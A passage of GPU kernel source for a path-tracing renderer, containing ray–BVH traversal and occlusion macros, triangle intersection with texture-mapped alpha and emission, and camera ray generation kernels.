COS_THETA_T = 0.0f; \ F = 1.0f; \ } else { \ float cos_theta_i = fabs(I); \ float _cos_theta_t = sqrt(cos_theta_t2); \ float rs = (cos_theta_i - IOR * _cos_theta_t) / \ (cos_theta_i + IOR * _cos_theta_t); \ float rp = (IOR * cos_theta_i - _cos_theta_t) / \ (IOR * cos_theta_i + _cos_theta_t); \ COS_THETA_T = (I > 0.0f) ? -_cos_theta_t : _cos_theta_t; \ F = 0.5f * (rs * rs + rp * rp); \ } \ } /// #define TRACE(USE_NODES_IMAGE, USE_TRIANGLES_IMAGE, PRIMARY_RAY) \ { \ float id[3], ood[3]; \ id[0] = 1.0f / NOT_ZERO(d[0]); \ id[1] = 1.0f / NOT_ZERO(d[1]); \ id[2] = 1.0f / NOT_ZERO(d[2]); \ ood[0] = o[0] * id[0]; \ ood[1] = o[1] * id[1]; \ ood[2] = o[2] * id[2]; \ int32_t h_tri_index = NO_TRI_HIT; \ int32_t h_material_type; \ float h_u, h_v; \ float h_t = FLT_MAX; \ uint32_t top_tree_height; \ if (USE_NODES_IMAGE) { \ uint32_t node_pixel = (top_tree_offset << 4); \ top_tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ } else { \ top_tree_height = nodes[top_tree_offset].extra[0]; \ } \ uint32_t tree_height = top_tree_height; \ uint32_t tree_offset = top_tree_offset; \ uint32_t node_offset = 0; \ uint32_t trail = 0x0; \ uint32_t key = 0x0; \ uint32_t level_bit = 0x1 << (top_tree_height - 1); \ uint32_t hit_leaf = TREE_NO_LEAF_HIT; \ uint32_t mesh_triangle_offset = 0; \ uint32_t hit_mask = HM_TEST_NODES; \ while (true) { \ while (hit_leaf >= TREE_NO_LEAF_HIT) { \ uint32_t node_index = node_offset + tree_offset; \ uint32_t node_pixel = (node_index << 4); \ if (level_bit == LB_NEW_SUB_TREE) { \ if (USE_NODES_IMAGE) { \ tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ mesh_triangle_offset = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_1); \ } else { \ tree_height = nodes[node_index].extra[0]; \ mesh_triangle_offset = nodes[node_index].extra[1]; \ } \ trail <<= tree_height; \ key <<= tree_height; \ level_bit = 0x1 << (tree_height - 1); \ } \ if (hit_mask == HM_TEST_NODES) { \ float l_bounds[6], r_bounds[6]; \ if (USE_NODES_IMAGE) { \ l_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS); \ l_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 1); \ l_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 2); \ l_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 3); \ l_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 4); \ l_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 5); \ r_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS); \ r_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 1); \ r_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 2); \ r_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 3); \ r_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 4); \ r_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 5); \ } else { \ l_bounds[0] = nodes[node_index].l_bounds[0]; \ l_bounds[1] = nodes[node_index].l_bounds[1]; \ l_bounds[2] = nodes[node_index].l_bounds[2]; \ l_bounds[3] = nodes[node_index].l_bounds[3]; \ l_bounds[4] = nodes[node_index].l_bounds[4]; \ l_bounds[5] = nodes[node_index].l_bounds[5]; \ r_bounds[0] = nodes[node_index].r_bounds[0]; \ r_bounds[1] = nodes[node_index].r_bounds[1]; \ r_bounds[2] = nodes[node_index].r_bounds[2]; \ r_bounds[3] = nodes[node_index].r_bounds[3]; \ r_bounds[4] = nodes[node_index].r_bounds[4]; \ r_bounds[5] = nodes[node_index].r_bounds[5]; \ } \ float l_lo[3], l_hi[3]; \ l_lo[0] = l_bounds[0] * id[0] - ood[0]; \ l_lo[1] = l_bounds[1] * id[1] - ood[1]; \ l_lo[2] = l_bounds[2] * id[2] - ood[2]; \ l_hi[0] = l_bounds[3] * id[0] - ood[0]; \ l_hi[1] = l_bounds[4] * id[1] - ood[1]; \ l_hi[2] = l_bounds[5] * id[2] - ood[2]; \ float r_lo[3], r_hi[3]; \ r_lo[0] = r_bounds[0] * id[0] - ood[0]; \ r_lo[1] = r_bounds[1] * id[1] - ood[1]; \ r_lo[2] = r_bounds[2] * id[2] - ood[2]; \ r_hi[0] = r_bounds[3] * id[0] - ood[0]; \ r_hi[1] = r_bounds[4] * id[1] - ood[1]; \ r_hi[2] = r_bounds[5] * id[2] - ood[2]; \ float l_near = fmax(fmax(fmax(fmin(l_lo[0], l_hi[0]),\ fmin(l_lo[1], l_hi[1])),\ fmin(l_lo[2], l_hi[2])), 0.0f); \ float l_far = fmin(fmin(fmax(l_lo[0], l_hi[0]),\ fmax(l_lo[1], l_hi[1])),\ fmax(l_lo[2], l_hi[2])); \ float r_near = fmax(fmax(fmax(fmin(r_lo[0], r_hi[0]),\ fmin(r_lo[1], r_hi[1])),\ fmin(r_lo[2], r_hi[2])), 0.0f); \ float r_far = fmin(fmin(fmax(r_lo[0], r_hi[0]),\ fmax(r_lo[1], r_hi[1])),\ fmax(r_lo[2], r_hi[2])); \ hit_mask = (((l_far >= l_near) && (l_near < h_t)) << 1) | \ ((r_far >= r_near) && (r_near < h_t)); \ if (hit_mask == HM_BOTH) { \ hit_mask = (l_near < r_near) + 1; \ trail |= level_bit; \ } \ } \ if (hit_mask == HM_TEST_NODES) { \ break; \ } \ if (hit_mask == HM_RIGHT) { \ key |= level_bit; \ node_offset += level_bit; \ } else { \ ++node_offset; \ } \ uint child = (hit_mask & 0x1); \ if (USE_NODES_IMAGE) { \ child = tex1Dfetch<uint32_t>(nodes_image, NODE_L + child); \ } else { \ child = nodes[node_index].child[child]; \ } \ hit_mask = HM_TEST_NODES; \ level_bit >>= 1; \ if (child & TREE_LEAF) { \ hit_leaf = (child & TREE_LEAF_MASK); \ break; \ } else if (child & TREE_SUB_TREE) { \ tree_offset = (child & TREE_SUB_TREE_MASK); \ level_bit = LB_NEW_SUB_TREE; \ node_offset = 0; \ } \ } \ if (hit_leaf != TREE_NO_LEAF_HIT) { \ uint tri_count = (hit_leaf >> (31 - TREE_LEAF_TRIANGLE_FACTOR)); \ uint tri_offset = mesh_triangle_offset + \ (hit_leaf & \ (TREE_LEAF_MASK >> TREE_LEAF_TRIANGLE_FACTOR)); \ for (uint32_t ti = tri_offset; ti <= tri_offset + tri_count; ++ti) { \ uint32_t tri_pixel = ti * 42; \ float vertex[3]; \ float edges[2][3]; \ float surface_normal[3]; \ if (USE_TRIANGLES_IMAGE) { \ vertex[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX); \ vertex[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1); \ vertex[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2); \ edges[0][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0); \ edges[0][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1); \ edges[0][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2); \ edges[1][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1); \ edges[1][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1); \ edges[1][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2); \ surface_normal[0] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N); \ surface_normal[1] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N + 1); \ surface_normal[2] = tex1Dfetch<float>(triangles_image, \ TRI_SURF_N + 2); \ } else { \ vertex[0] = triangles[ti].vertex[0]; \ vertex[1] = triangles[ti].vertex[1]; \ vertex[2] = triangles[ti].vertex[2]; \ edges[0][0] = triangles[ti].edges[0][0]; \ edges[0][1] = triangles[ti].edges[0][1]; \ edges[0][2] = triangles[ti].edges[0][2]; \ edges[1][0] = triangles[ti].edges[1][0]; \ edges[1][1] = triangles[ti].edges[1][1]; \ edges[1][2] = triangles[ti].edges[1][2]; \ surface_normal[0] = triangles[ti].surface_normal[0]; \ surface_normal[1] = triangles[ti].surface_normal[1]; \ surface_normal[2] = triangles[ti].surface_normal[2]; \ } \ float c[3], r[3]; \ c[0] = vertex[0] - o[0]; \ c[1] = vertex[1] - o[1]; \ c[2] = vertex[2] - o[2]; \ r[0] = (d[1] * c[2]) - (d[2] * c[1]); \ r[1] = (d[2] * c[0]) - (d[0] * c[2]); \ r[2] = (d[0] * c[1]) - (d[1] * c[0]); \ float u, v; \ u = r[0] * edges[1][0] + r[1] * edges[1][1] + \ r[2] * edges[1][2]; \ v = r[0] * edges[0][0] + r[1] * edges[0][1] + \ r[2] * edges[0][2]; \ float dot = DOT(-d, surface_normal); \ float t = c[0] * surface_normal[0] + \ c[1] * surface_normal[1] + \ c[2] * surface_normal[2]; \ float abs_dot = fabs(dot); \ float sign_dot = copysignf(1.0f, -dot); \ float rcp_dot = 1.0f / NOT_ZERO(abs_dot); \ u *= sign_dot; \ v *= sign_dot; \ t *= sign_dot * rcp_dot; \ if ((dot != 0.0f) && (u >= 0.0f) && (v >= 0.0f) && \ ((u + v) < abs_dot) && (t > 0.0f) && (t < h_t)) { \ uint32_t material_id = material_id; \ float vertex_uvs[3][2]; \ if (USE_TRIANGLES_IMAGE) { \ material_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); \ vertex_uvs[0][0] = tex1Dfetch<float>(triangles_image, TRI_UV_0); \ vertex_uvs[0][1] = tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1); \ vertex_uvs[1][0] = tex1Dfetch<float>(triangles_image, TRI_UV_1); \ vertex_uvs[1][1] = tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1); \ vertex_uvs[2][0] = tex1Dfetch<float>(triangles_image, TRI_UV_2); \ vertex_uvs[2][1] = tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); \ } else {\ material_id = triangles[ti].material_id; \ vertex_uvs[0][0] = triangles[ti].vertex_uvs[0][0]; \ vertex_uvs[0][1] = triangles[ti].vertex_uvs[0][1]; \ vertex_uvs[1][0] = triangles[ti].vertex_uvs[1][0]; \ vertex_uvs[1][1] = triangles[ti].vertex_uvs[1][1]; \ vertex_uvs[2][0] = triangles[ti].vertex_uvs[2][0]; \ vertex_uvs[2][1] = triangles[ti].vertex_uvs[2][1]; \ } \ u *= rcp_dot; \ v *= rcp_dot; \ float w = 1.0f - u - v; \ float uv[2]; \ uv[0] = w * vertex_uvs[0][0] + u * vertex_uvs[1][0] + \ v * vertex_uvs[2][0]; \ uv[1] = w * vertex_uvs[0][1] + u * vertex_uvs[1][1] + \ v * vertex_uvs[2][1]; \ if ((materials[material_id].glass > 0.0f) || \ (materials[material_id].emission > 0.0f) || \ (materials[material_id].double_sided) || (dot > 0.0f)) { \ float alpha = 1.0f; \ float alpha_sample = 0.0f; \ float emission = materials[material_id].emission; \ if (materials[material_id].map_flags & MAP_FLAG_EMISSION) { \ float2 emission_uv; \ emission_uv.x = uv[0]; \ emission_uv.y = uv[1]; \ emission_uv.x = \ lerp(materials[material_id].emission_bounds[0] + 0.5f, \ materials[material_id].emission_bounds[1] - 0.5f, \ emission_uv.x); \ emission_uv.y = \ lerp(materials[material_id].emission_bounds[2] + 0.5f, \ materials[material_id].emission_bounds[3] - 0.5f, \ emission_uv.y); \ float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, \ emission_uv.y); \ emission *= fmax(fmax(emission_map.y, emission_map.z), \ emission_map.w); \ } \ if (emission == 0.0f) { \ alpha = materials[material_id].albedo[3]; \ PRNG(global_id, b_seeds.w, alpha_sample); \ if (materials[material_id].map_flags & MAP_FLAG_ALBEDO) { \ float2 albedo_uv; \ albedo_uv.x = uv[0]; \ albedo_uv.y = uv[1]; \ albedo_uv.x = \ lerp(materials[material_id].albedo_bounds[0] + 0.5f, \ materials[material_id].albedo_bounds[1] - 0.5f, \ albedo_uv.x); \ albedo_uv.y = \ lerp(materials[material_id].albedo_bounds[2] + 0.5f, \ materials[material_id].albedo_bounds[3] - 0.5f, \ albedo_uv.y); \ float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, \ albedo_uv.y); \ alpha *= albedo_map.x; \ } \ } \ if (alpha_sample < alpha) { \ h_t = t; \ h_u = u; \ h_v = v; \ if (emission > 0.0f) { \ h_material_type = STATE_EMISSIVE; \ } else { \ h_material_type = STATE_MATERIAL; \ } \ h_tri_index = ti; \ } \ } \ } \ } \ hit_leaf = TREE_NO_LEAF_HIT; \ } \ if (trail == 0x0) { \ break; \ } \ uint32_t shift = 31 - __clz(trail & -trail); \ if (shift >= tree_height) { \ shift -= tree_height; \ trail >>= tree_height; \ key >>= tree_height; \ tree_height = top_tree_height; \ tree_offset = top_tree_offset; \ mesh_triangle_offset = 0; \ } \ level_bit = (0x1 << shift); \ hit_mask = ((key & level_bit) > 0) + 1; \ trail ^= level_bit; \ key = (key & (0xFFFFFFFF << (shift + 1))); \ uint32_t local_key = key & (0xFFFFFFFF >> (32 - tree_height)); \ node_offset = local_key + ((32 - __popc(local_key)) - \ (32 - tree_height) - (shift + 1)); \ } \ ray_state[RS_DIR_X] = d[0]; \ ray_state[RS_DIR_Y] = d[1]; \ ray_state[RS_DIR_Z] = d[2]; \ if (h_tri_index != NO_TRI_HIT) {\ ray_state[RS_STATE] = h_material_type; \ o[0] += d[0] * h_t; \ o[1] += d[1] * h_t; \ o[2] += d[2] * h_t; \ ray_state[RS_ORIGIN_X] = o[0]; \ ray_state[RS_ORIGIN_Y] = o[1]; \ ray_state[RS_ORIGIN_Z] = o[2]; \ ray_state[RS_U] = h_u; \ ray_state[RS_V] = h_v; \ ray_state[RS_HIT_DISTANCE] = h_t; \ ray_state[RS_TRI_INDEX] = h_tri_index; \ } else {\ ray_state[RS_STATE] = STATE_ENVIRONMENT; \ }\ } /// #define OCCLUSION(O, D, USE_NODES_IMAGE, USE_TRIANGLES_IMAGE) \ { \ float id[3], ood[3]; \ id[0] = 1.0f / NOT_ZERO(D[0]); \ id[1] = 1.0f / NOT_ZERO(D[1]); \ id[2] = 1.0f / NOT_ZERO(D[2]); \ ood[0] = O[0] * id[0]; \ ood[1] = O[1] * id[1]; \ ood[2] = O[2] * id[2]; \ uint32_t top_tree_height; \ if (USE_NODES_IMAGE) { \ uint32_t node_pixel = (top_tree_offset << 4); \ top_tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ } else { \ top_tree_height = nodes[top_tree_offset].extra[0]; \ } \ uint32_t tree_height = top_tree_height; \ uint32_t tree_offset = top_tree_offset; \ uint32_t node_offset = 0; \ uint32_t trail = 0x0; \ uint32_t key = 0x0; \ uint32_t level_bit = 0x1 << (top_tree_height - 1); \ uint32_t hit_leaf = TREE_NO_LEAF_HIT; \ uint32_t mesh_triangle_offset = 0; \ uint32_t hit_mask = HM_TEST_NODES; \ while (true) { \ while (hit_leaf >= TREE_NO_LEAF_HIT) { \ uint32_t node_index = node_offset + tree_offset; \ uint32_t node_pixel = (node_index << 4); \ if (level_bit == LB_NEW_SUB_TREE) { \ if (USE_NODES_IMAGE) { \ tree_height = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_0); \ mesh_triangle_offset = tex1Dfetch<uint32_t>(nodes_image, \ NODE_EXTRA_1); \ } else { \ tree_height = nodes[node_index].extra[0]; \ mesh_triangle_offset = nodes[node_index].extra[1]; \ } \ trail <<= tree_height; \ key <<= tree_height; \ level_bit = 0x1 << (tree_height - 1); \ } \ if (hit_mask == HM_TEST_NODES) { \ float l_bounds[6], r_bounds[6]; \ if (USE_NODES_IMAGE) { \ l_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS); \ l_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 1); \ l_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 2); \ l_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 3); \ l_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 4); \ l_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_L_BOUNDS + 5); \ r_bounds[0] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS); \ r_bounds[1] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 1); \ r_bounds[2] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 2); \ r_bounds[3] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 3); \ r_bounds[4] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 4); \ r_bounds[5] = tex1Dfetch<float>(nodes_image, NODE_R_BOUNDS + 5); \ } else { \ l_bounds[0] = nodes[node_index].l_bounds[0]; \ l_bounds[1] = nodes[node_index].l_bounds[1]; \ l_bounds[2] = nodes[node_index].l_bounds[2]; \ l_bounds[3] = nodes[node_index].l_bounds[3]; \ l_bounds[4] = nodes[node_index].l_bounds[4]; \ l_bounds[5] = nodes[node_index].l_bounds[5]; \ r_bounds[0] = nodes[node_index].r_bounds[0]; \ r_bounds[1] = nodes[node_index].r_bounds[1]; \ r_bounds[2] = nodes[node_index].r_bounds[2]; \ r_bounds[3] = nodes[node_index].r_bounds[3]; \ r_bounds[4] = nodes[node_index].r_bounds[4]; \ r_bounds[5] = nodes[node_index].r_bounds[5]; \ } \ float l_lo[3], l_hi[3]; \ l_lo[0] = l_bounds[0] * id[0] - ood[0]; \ l_lo[1] = l_bounds[1] * id[1] - ood[1]; \ l_lo[2] = l_bounds[2] * id[2] - ood[2]; \ l_hi[0] = l_bounds[3] * id[0] - ood[0]; \ l_hi[1] = l_bounds[4] * id[1] - ood[1]; \ l_hi[2] = l_bounds[5] * id[2] - ood[2]; \ float r_lo[3], r_hi[3]; \ r_lo[0] = r_bounds[0] * id[0] - ood[0]; \ r_lo[1] = r_bounds[1] * id[1] - ood[1]; \ r_lo[2] = r_bounds[2] * id[2] - ood[2]; \ r_hi[0] = r_bounds[3] * id[0] - ood[0]; \ r_hi[1] = r_bounds[4] * id[1] - ood[1]; \ r_hi[2] = r_bounds[5] * id[2] - ood[2]; \ float l_near = fmax(fmax(fmax(fmin(l_lo[0], l_hi[0]),\ fmin(l_lo[1], l_hi[1])),\ fmin(l_lo[2], l_hi[2])), 0.0f); \ float l_far = fmin(fmin(fmax(l_lo[0], l_hi[0]),\ fmax(l_lo[1], l_hi[1])),\ fmax(l_lo[2], l_hi[2])); \ float r_near = fmax(fmax(fmax(fmin(r_lo[0], r_hi[0]),\ fmin(r_lo[1], r_hi[1])),\ fmin(r_lo[2], r_hi[2])), 0.0f); \ float r_far = fmin(fmin(fmax(r_lo[0], r_hi[0]),\ fmax(r_lo[1], r_hi[1])),\ fmax(r_lo[2], r_hi[2])); \ hit_mask = (((l_far >= l_near) && (l_near < h_t)) << 1) | \ ((r_far >= r_near) && (r_near < h_t)); \ if (hit_mask == HM_BOTH) { \ hit_mask = (l_near < r_near) + 1; \ trail |= level_bit; \ } \ } \ if (hit_mask == HM_TEST_NODES) { \ break; \ } \ if (hit_mask == HM_RIGHT) { \ key |= level_bit; \ node_offset += level_bit; \ } else { \ ++node_offset; \ } \ uint child = (hit_mask & 0x1); \ if (USE_NODES_IMAGE) { \ child = tex1Dfetch<uint32_t>(nodes_image, NODE_L + child); \ } else { \ child = nodes[node_index].child[child]; \ } \ hit_mask = HM_TEST_NODES; \ level_bit >>= 1; \ if (child & TREE_LEAF) { \ hit_leaf = (child & TREE_LEAF_MASK); \ break; \ } else if (child & TREE_SUB_TREE) { \ tree_offset = (child & TREE_SUB_TREE_MASK); \ level_bit = LB_NEW_SUB_TREE; \ node_offset = 0; \ } \ } \ if (hit_leaf != TREE_NO_LEAF_HIT) { \ uint tri_count = (hit_leaf >> (31 - TREE_LEAF_TRIANGLE_FACTOR)); \ uint tri_offset = mesh_triangle_offset + \ (hit_leaf & \ (TREE_LEAF_MASK >> TREE_LEAF_TRIANGLE_FACTOR)); \ for (uint32_t ti = tri_offset; ti <= tri_offset + tri_count; ++ti) { \ uint32_t tri_pixel = ti * 42; \ float vertex[3]; \ float edges[2][3]; \ float surface_normal[3]; \ if (USE_TRIANGLES_IMAGE) { \ vertex[0] = tex1Dfetch<float>(triangles_image, TRI_VERTEX); \ vertex[1] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 1); \ vertex[2] = tex1Dfetch<float>(triangles_image, TRI_VERTEX + 2); \ edges[0][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0); \ edges[0][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 1); \ edges[0][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_0 + 2); \ edges[1][0] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1); \ edges[1][1] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 1); \ edges[1][2] = tex1Dfetch<float>(triangles_image, TRI_EDGES_1 + 2); \ surface_normal[0] = tex1Dfetch<float>(triangles_image, TRI_SURF_N); \ surface_normal[1] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 1); \ surface_normal[2] = tex1Dfetch<float>(triangles_image, TRI_SURF_N + 2); \ } else { \ vertex[0] = triangles[ti].vertex[0]; \ vertex[1] = triangles[ti].vertex[1]; \ vertex[2] = triangles[ti].vertex[2]; \ edges[0][0] = triangles[ti].edges[0][0]; \ edges[0][1] = triangles[ti].edges[0][1]; \ edges[0][2] = triangles[ti].edges[0][2]; \ edges[1][0] = triangles[ti].edges[1][0]; \ edges[1][1] = triangles[ti].edges[1][1]; \ edges[1][2] = triangles[ti].edges[1][2]; \ surface_normal[0] = triangles[ti].surface_normal[0]; \ surface_normal[1] = triangles[ti].surface_normal[1]; \ surface_normal[2] = triangles[ti].surface_normal[2]; \ } \ float c[3], r[3]; \ c[0] = vertex[0] - O[0]; \ c[1] = vertex[1] - O[1]; \ c[2] = vertex[2] - O[2]; \ r[0] = (D[1] * c[2]) - (D[2] * c[1]); \ r[1] = (D[2] * c[0]) - (D[0] * c[2]); \ r[2] = (D[0] * c[1]) - (D[1] * c[0]); \ float u, v; \ u = r[0] * edges[1][0] + r[1] * edges[1][1] + \ r[2] * edges[1][2]; \ v = r[0] * edges[0][0] + r[1] * edges[0][1] + \ r[2] * edges[0][2]; \ float dot = DOT(-D, surface_normal); \ float t = c[0] * surface_normal[0] + \ c[1] * surface_normal[1] + \ c[2] * surface_normal[2]; \ float abs_dot = fabs(dot); \ float sign_dot = copysignf(1.0f, -dot); \ float rcp_dot = 1.0f / NOT_ZERO(abs_dot); \ u *= sign_dot; \ v *= sign_dot; \ t *= sign_dot * rcp_dot; \ if ((dot != 0.0f) && (u >= 0.0f) && (v >= 0.0f) && \ ((u + v) < abs_dot) && (t > 0.0f) && (t < h_t)) { \ uint32_t material_id = material_id; \ float vertex_uvs[3][2]; \ if (USE_TRIANGLES_IMAGE) { \ material_id = tex1Dfetch<uint32_t>(triangles_image, TRI_MAT_ID); \ vertex_uvs[0][0] = tex1Dfetch<float>(triangles_image, TRI_UV_0); \ vertex_uvs[0][1] = tex1Dfetch<float>(triangles_image, TRI_UV_0 + 1); \ vertex_uvs[1][0] = tex1Dfetch<float>(triangles_image, TRI_UV_1); \ vertex_uvs[1][1] = tex1Dfetch<float>(triangles_image, TRI_UV_1 + 1); \ vertex_uvs[2][0] = tex1Dfetch<float>(triangles_image, TRI_UV_2); \ vertex_uvs[2][1] = tex1Dfetch<float>(triangles_image, TRI_UV_2 + 1); \ } else {\ material_id = triangles[ti].material_id; \ vertex_uvs[0][0] = triangles[ti].vertex_uvs[0][0]; \ vertex_uvs[0][1] = triangles[ti].vertex_uvs[0][1]; \ vertex_uvs[1][0] = triangles[ti].vertex_uvs[1][0]; \ vertex_uvs[1][1] = triangles[ti].vertex_uvs[1][1]; \ vertex_uvs[2][0] = triangles[ti].vertex_uvs[2][0]; \ vertex_uvs[2][1] = triangles[ti].vertex_uvs[2][1]; \ } \ u *= rcp_dot; \ v *= rcp_dot; \ float w = 1.0f - u - v; \ float uv[2]; \ uv[0] = w * vertex_uvs[0][0] + u * vertex_uvs[1][0] + \ v * vertex_uvs[2][0]; \ uv[1] = w * vertex_uvs[0][1] + u * vertex_uvs[1][1] + \ v * vertex_uvs[2][1]; \ if ((materials[material_id].glass > 0.0f) || \ (materials[material_id].emission > 0.0f) || \ (materials[material_id].double_sided) || (dot > 0.0f)) { \ float alpha = 1.0f; \ float alpha_sample = 0.0f; \ float emission = materials[material_id].emission; \ if (materials[material_id].map_flags & MAP_FLAG_EMISSION) { \ float2 emission_uv; \ emission_uv.x = uv[0]; \ emission_uv.y = uv[1]; \ emission_uv.x = \ lerp(materials[material_id].emission_bounds[0] + 0.5f, \ materials[material_id].emission_bounds[1] - 0.5f, \ emission_uv.x); \ emission_uv.y = \ lerp(materials[material_id].emission_bounds[2] + 0.5f, \ materials[material_id].emission_bounds[3] - 0.5f, \ emission_uv.y); \ float4 emission_map = tex2D<float4>(emission_atlas, emission_uv.x, \ emission_uv.y); \ emission *= fmax(fmax(emission_map.y, emission_map.z), \ emission_map.w); \ } \ if (emission == 0.0f) { \ alpha = materials[material_id].albedo[3]; \ PRNG(global_id, b_seeds.w, alpha_sample); \ if (materials[material_id].map_flags & MAP_FLAG_ALBEDO) { \ float2 albedo_uv; \ albedo_uv.x = uv[0]; \ albedo_uv.y = uv[1]; \ albedo_uv.x = \ lerp(materials[material_id].albedo_bounds[0] + 0.5f, \ materials[material_id].albedo_bounds[1] - 0.5f, \ albedo_uv.x); \ albedo_uv.y = \ lerp(materials[material_id].albedo_bounds[2] + 0.5f, \ materials[material_id].albedo_bounds[3] - 0.5f, \ albedo_uv.y); \ float4 albedo_map = tex2D<float4>(albedo_atlas, albedo_uv.x, \ albedo_uv.y); \ alpha *= albedo_map.x; \ } \ } \ if (alpha_sample < alpha) { \ h_t = t; \ node_offset = TREE_TRAIL_END; \ break; \ } \ } \ } \ } \ if (node_offset == TREE_TRAIL_END) { \ break; \ } \ hit_leaf = TREE_NO_LEAF_HIT; \ } \ if (node_offset == TREE_TRAIL_END) { \ break; \ } \ if (trail == 0x0) { \ break; \ } \ uint32_t shift = 31 - __clz(trail & -trail); \ if (shift >= tree_height) { \ shift -= tree_height; \ trail >>= tree_height; \ key >>= tree_height; \ tree_height = top_tree_height; \ tree_offset = top_tree_offset; \ mesh_triangle_offset = 0; \ } \ level_bit = (0x1 << shift); \ hit_mask = ((key & level_bit) > 0) + 1; \ trail ^= level_bit; \ key = (key & (0xFFFFFFFF << (shift + 1))); \ uint32_t local_key = key & (0xFFFFFFFF >> (32 - tree_height)); \ node_offset = local_key + ((32 - __popc(local_key)) - \ (32 - tree_height) - (shift + 1)); \ } \ } /// __global__ void Primary(float* ray_state, Material* materials, int32_t use_nodes_image, hipTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t albedo_atlas, hipTextureObject_t emission_atlas, Camera camera, uint4 b_seeds, int32_t width, int32_t height, int32_t invert_y, int32_t sample) { int32_t global_id = GET_GLOBAL_ID(); int32_t ray_count = width * height; if (global_id >= ray_count) { return; } float o[3], d[3]; float pixel_sample[2]; PRNG(global_id, b_seeds.x, pixel_sample[0]); PRNG(global_id, b_seeds.y, pixel_sample[1]); int32_t x_pixel = global_id % width; int32_t y_pixel = global_id / width; if (invert_y) { y_pixel = (height - 1) - y_pixel; } float p[3] = { camera.root_pixel[0] + ((x_pixel + pixel_sample[0]) * camera.pixel_offset[0]), camera.root_pixel[1] + ((y_pixel + pixel_sample[1]) * camera.pixel_offset[1]), 1.0f }; p[0] *= camera.focal_depth; p[1] *= camera.focal_depth; p[2] *= camera.focal_depth; float pt[3]; TRANSFORM_X(p, camera.transform, pt); TRANSFORM_Y(p, camera.transform, pt); TRANSFORM_Z(p, camera.transform, pt); float aperture_sample[4]; PRNG(global_id, b_seeds.z, aperture_sample[0]); PRNG(global_id, b_seeds.w, aperture_sample[1]); float aperture_o[3]; CONCENTRIC_HEMI(aperture_sample[0], aperture_sample[1], aperture_o); aperture_o[0] *= camera.aperture_size; aperture_o[1] *= camera.aperture_size; aperture_o[2] = 0.0f; TRANSFORM_X(aperture_o, camera.transform, o); TRANSFORM_Y(aperture_o, camera.transform, o); TRANSFORM_Z(aperture_o, camera.transform, o); d[0] = pt[0] - o[0]; d[1] = pt[1] - o[1]; d[2] = pt[2] - o[2]; NORMALIZE(d); ray_state[RS_THROUGHPUT_R] = 1.0f; ray_state[RS_THROUGHPUT_G] = 1.0f; ray_state[RS_THROUGHPUT_B] = 1.0f; if (sample == 0) { ray_state[RS_COLOR_R] = 0.0f; ray_state[RS_COLOR_G] = 0.0f; ray_state[RS_COLOR_B] = 0.0f; } TRACE(use_nodes_image, use_triangles_image, true); ray_state[RS_LAST_BRDF_PDF] = DIRAC_PDF; return; } /// __global__ void Secondary(float* ray_state, Material* materials, int32_t use_nodes_image, hipTextureObject_t nodes_image, TwoNode* nodes, int32_t top_tree_offset, int32_t use_triangles_image, hipTextureObject_t triangles_image, TreeTriangle* triangles, hipTextureObject_t albedo_atlas, hipTextureObject_t emission_atlas, uint4 b_seeds, int32_t width, int32_t height) { int32_t 